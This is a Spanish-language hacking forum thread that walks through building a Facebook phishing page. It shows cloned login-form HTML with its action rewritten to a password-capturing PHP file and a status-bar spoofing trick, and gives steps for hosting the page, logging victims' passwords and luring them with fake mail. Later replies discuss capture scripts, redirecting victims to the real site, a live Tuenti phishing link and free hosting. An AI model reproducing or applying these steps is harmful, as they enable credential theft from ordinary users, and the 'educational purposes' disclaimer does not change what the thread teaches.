|
Título: phishing fakebuuk Publicado por: p1r4t0s en 8 Febrero 2011, 04:42 am Bueno este es un ejemplo de phishing
. . . Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material... :xD Cosas que vamos a necesitar: :P +Conocimietos basicos de html y php +Archivo index.htm con la fake page +Archivo write.php con el script capture pass +Archivo pass.txt donde se guardaran las pass Paso1.- Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com Paso2.- Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm 3.-Buscamos los campos el formulario donde se pone el user y pass. Código: <form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form> 4.- Editamos donde empieza el form y cambiamos: Código: <form method=GET action=write.php 5.- Editamos en el boton imput entrar: Código: <input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" /> no pongo todo el code pq es muuuy largo :xD 6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a) 7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas) 8.-Ahora tenemos hecho el 50% del trabajo, toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona. Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos. Como ven no tiene mucha ciencia los cripts en si. Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español :D y solo quería comprobar lo que se puede hacer :) Título: Re: phishing fakebuuk Publicado por: JuszR en 9 Febrero 2011, 00:01 am Una especia de xploit, o me equivoco ?
Título: Re: phishing fakebuuk Publicado por: p1r4t0s en 21 Febrero 2011, 04:03 am Hola JuszR, un xploit seria el mail seria el fake mail y este es una fake page.
Citar XPLOIT Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social. Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking. PHISHING Ver en wiki (http://es.wikipedia.org/wiki/Phishing) Espero que la explicación resuelva tus dudas :D Título: Re: phishing fakebuuk Publicado por: johndogget en 12 Febrero 2012, 22:38 pm hola soy nuevo y con poca experiencia y sobre todo conocimientos. como armas el fake mail para que sea igual a los que manda fezebuuk? gracias
Título: Re: phishing fakebuuk Publicado por: Bl1ttCeR en 12 Mayo 2012, 17:21 pm y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)
Título: Re: phishing fakebuuk Publicado por: Runex en 12 Mayo 2012, 17:46 pm p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:
http://zonacx.webs.com/tuenti.html Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :). Un saludo Título: Re: phishing fakebuuk Publicado por: Runex en 12 Mayo 2012, 18:03 pm p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?: http://zonacx.webs.com/tuenti.html Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :). Aviso, no pongáis ningún dato en el formulario que se copian en un txt y solo lo hice como prueba, no quiero lios con compañeros :) Un saludo :) Título: Re: phishing fakebuuk Publicado por: Bl1ttCeR en 12 Mayo 2012, 18:14 pm Aquí os dejo una idea de write.php ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.
Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da... Código: <?php Título: Re: phishing fakebuuk Publicado por: Runex en 12 Mayo 2012, 18:19 pm Aquí os dejo una idea de write.php ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime Código: <?php Yo he usado éste para tuenti: Código
Tampoco hay que calentarse mucho la cabeza xD. Eso que dices para loguearse, voy a ponerme ahora con ello pero simplemente hay que añadir un header como has hecho tú :) Un saludo :) Título: Re: phishing fakebuuk Publicado por: Bl1ttCeR en 12 Mayo 2012, 18:23 pm Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.
PD: este post tiene casi 2700visitas y nadie ha dicho nada... Título: Re: phishing fakebuuk Publicado por: colour en 28 Enero 2013, 23:53 pm Hola! mi duda es la siguiente:
Para la FalseWeb, ¿Dónde la subiríais? Lo suyo es un hosting gratuito y sin anuncios, ¿No? ¿Sabéis de alguno? Otra cosa más, en vez de que me mande los datos a un archivo, ¿Por qué no mejor que los mande a un mail falso? sería algo así como email-falso@sogetthis.com y eso lo enviaría a la web de mailinator. Voy a hacer pruebas con este asunto y si consigo avanzar algo os lo iré comentando, ¡Gracias por la ayuda! :) |